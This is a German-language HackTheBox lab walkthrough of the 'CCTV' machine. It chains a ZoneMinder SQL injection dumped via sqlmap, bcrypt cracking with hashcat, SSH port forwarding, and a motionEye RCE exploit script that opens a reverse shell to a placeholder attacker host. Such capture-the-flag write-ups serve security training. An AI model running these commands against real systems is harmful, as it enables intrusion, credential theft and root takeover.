
HackTheBox CCTV Walkthrough, der CVE-2024-51482 ZoneMinder SQL-Injection, bcrypt-Hash-Cracking und CVE-2025-60787 motionEye RCE verkettet, um Root zu erlangen.
Plattform: HackTheBox | OS: Linux
ZoneMinder SQL-Injection über CVE-2024-51482 gibt einen bcrypt-Hash aus der Datenbank aus. Das Knacken mit hashcat ermöglicht SSH-Zugriff. Eine interne motionEye-Instanz, die über Portweiterleitung exponiert ist, ist anfällig für CVE-2025-60787 — liefert eine Root-Shell.
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
cctv.htb zu /etc/hosts hinzugefügt. Port 80 hostete eine ZoneMinder-Installation.
CVE-2024-51482 ist eine SQL-Injection-Schwachstelle im Login-Endpunkt von ZoneMinder. Der username-Parameter ist nicht bereinigt, was eine Datenbankextraktion ermöglicht.
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
Ein bcrypt-Passwort-Hash wurde aus der users-Tabelle extrahiert.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
Passwort geknackt.
ssh <user>@10.129.53.160
User-Flag abgerufen. Nach internen Diensten gesucht.
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
Port weitergeleitet.
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787 ist eine authentifizierte RCE in motionEye. Mit Zugriff auf das interne Panel werden beliebige Befehle als root ausgeführt.
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
Root-Shell erhalten. Root-Flag unter /root/root.txt.
Nur für Bildungszwecke. Testen Sie nur Systeme, die Ihnen gehören oder für die Sie ausdrückliche Genehmigung zum Testen haben.